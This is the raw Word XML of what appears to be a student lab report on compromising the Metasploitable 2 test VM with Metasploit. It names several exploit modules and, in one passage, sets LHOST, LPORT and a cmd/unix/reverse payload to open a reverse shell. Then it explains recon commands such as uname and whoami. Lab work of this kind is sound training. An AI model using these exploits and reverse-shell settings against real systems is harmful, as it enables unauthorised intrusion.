          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E621D67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>As the shell session is open, I have tried the following commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250EE0F2" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D8664D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6" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="465D3F1C" wp14:editId="024AF9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0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6F43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7" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1147062D" wp14:editId="6CC4AE5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1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E4EA2" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046B68E8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8" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5061F13D" wp14:editId="587087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44DC5" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65484EF6" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220A2FC0" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD6A04E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D0BC14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 xml:space="preserve">By trial and error I found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>another exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC5343" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA2FEE5" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E194A97" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>php_cgi_arg_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B4F73EC" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="121F0253" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47E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19" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7012D65C" wp14:editId="1DB67C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3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D89C" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8AA3D3" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="43BBB69C" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>I have the commands which can be seen in the images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13595A2A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="65E4A86A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0" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CDA29C0" wp14:editId="5880A5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4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DDC54" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="649A329E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="0A94C8C5" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>By trial and error I have found the following exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6DA3A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="1B4EA070" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="326DB976" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgres_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3670B65D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="1D10E71A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5A538E03" wp14:editId="527BE4A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5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E97B4" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="0F8EA444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2" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75FFB328" wp14:editId="6D88F3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6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0904E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="3DECE4BE" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="44100FC9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3" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39E7CEEA" wp14:editId="0CF9AE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7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65CA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61AAB60F" wp14:editId="6D173EE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8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D311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2FD6165D" wp14:editId="4324C8D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29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12777" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="39C3D679" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="2907BC6C" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t xml:space="preserve">After that exploit I have found </w:t>
      </w:r>
      <w:r>
        <w:t>this exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D43442" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="6FE58437" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="530E33AE" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="62E1843C" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>twiki_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="009ACC77" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="4DA29C77" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="725953A6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753914BA" wp14:editId="29DD07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B0B7A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="3F24310B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2" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F7F250C" wp14:editId="6BBCFE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A5826" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>I have tried the following commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72948BE2" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="47C75463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4C6CDC86" wp14:editId="0754D9A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3A66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4" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D2D738A" wp14:editId="33B6599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62C21" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="04C7B600" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="7C9DC077" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>After that exploit I have tried the following exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED8459" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="14FB328F" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="03CF64D4" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drb_remote_codeexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="465BDA6E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="4CD77764" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>I have entered these commands manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010C1179" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="4706EFC7" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="70296E32" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>set LHOST 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007575B8" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="3531C991" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>set LPORT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EA295" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="16800A7B" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t xml:space="preserve">set Payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491ED278" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="3E7D31DE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7598A5C3" wp14:editId="7C1C1FD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ED72E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="5CC1EF21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5DFECB54" wp14:editId="12CB4D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FA2A7" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="680F9617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7" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C625401" wp14:editId="033D5E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DDDC0" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="7E30F014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8" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6462917B" wp14:editId="347418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7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72D98" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="151D03A7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39" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64E041D4" wp14:editId="0A4A4E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1D292" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="4D97E7A8" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>After that I found the following exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EEFD9" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="07642D2E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>multi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>java_rmi_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2925ECEB" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="2EFEB77B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40" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FA7528B" wp14:editId="31169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39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1C7CA" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="16EA95FC" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="408892EE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41" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49ED408E" wp14:editId="2DD266E5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>66675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-81915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="5334635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="40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978A5" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="19163706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42" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BC23AD3" wp14:editId="6557B6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995EF" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="43" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="710029AE" wp14:editId="2E4BDD5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34635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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9A082" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t xml:space="preserve">The commands used in the shell will give the details of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> OS. The commands used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5F54ED" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0649B655" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="54E49120" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t xml:space="preserve">hostname - It gives </w:t>
      </w:r>
      <w:r>
        <w:t>the name of the host you are connected to; in this case the host is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA065F2" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2773CF48" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="20E3B2E2" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t xml:space="preserve">time- gives the present time </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5244A4" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="21203ECB" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : gives the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> name, version and other details about the current machine and the operating system running on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D15A4D8" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7261EE06" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r : It returns the current kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F54A40" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2E4CA6" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a: outputs all the information this tool can provide regarding the operating system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F3626" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="0D0D3257" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – prin</w:t>
      </w:r>
      <w:r>
        <w:t>t the username associated with the current effective user ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E50E19C" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="0FEC0BBF" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ls – It gives the list of all the files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8B4B57" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="13D64836" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t>ifconfig: displays the IP address and netmask of a network interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9CFFFC" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="08151B26" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:t xml:space="preserve">I used these basic commands to show that I am able to get into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF47EA" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="41369DF2" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:sectPr w:rsidR="003E1871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mbria"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable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0442CF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C41669E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB84C05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OpenSymbol" w:hint="default"/>
        <w:sz w:val="32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OpenSymbol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OpenSymbol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OpenSymbol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OpenSymbol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OpenSymbol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OpenSymbol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OpenSymbol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OpenSymbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6C0C63C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F9E1D2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9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1871"/>
    <w:rsid w:val="003E1871"/>
    <w:rsid w:val="00E47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14750"/>
  <w15:docId w15:val="{C4090376-D720-40E7-9D23-C10AA1BD9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2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cs="OpenSymbol"/>
      <w:sz w:val="32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  <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel20">
    <w:name w:val="ListLabel 20"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel21">
    <w:name w:val="ListLabel 21"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel22">
    <w:name w:val="ListLabel 22"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel23">
    <w:name w:val="ListLabel 23"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel24">
    <w:name w:val="ListLabel 24"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol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  <w:sz w:val="32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character" w:customStyle="1" w:styleId="ListLabel55">
    <w:name w:val="ListLabel 55"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel56">
    <w:name w:val="ListLabel 56"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel57">
    <w:name w:val="ListLabel 57"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel58">
    <w:name w:val="ListLabel 58"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel59">
    <w:name w:val="ListLabel 59"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel60">
    <w:name w:val="ListLabel 60"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel61">
    <w:name w:val="ListLabel 61"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel62">
    <w:name w:val="ListLabel 62"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel63">
    <w:name w:val="ListLabel 63"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel64">
    <w:name w:val="ListLabel 64"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel65">
    <w:name w:val="ListLabel 65"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel66">
    <w:name w:val="ListLabel 66"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel67">
    <w:name w:val="ListLabel 67"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel68">
    <w:name w:val="ListLabel 68"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel69">
    <w:name w:val="ListLabel 69"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel70">
    <w:name w:val="ListLabel 70"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel71">
    <w:name w:val="ListLabel 71"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel72">
    <w:name w:val="ListLabel 72"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel73">
    <w:name w:val="ListLabel 73"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel74">
    <w:name w:val="ListLabel 74"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel75">
    <w:name w:val="ListLabel 75"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel76">
    <w:name w:val="ListLabel 76"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
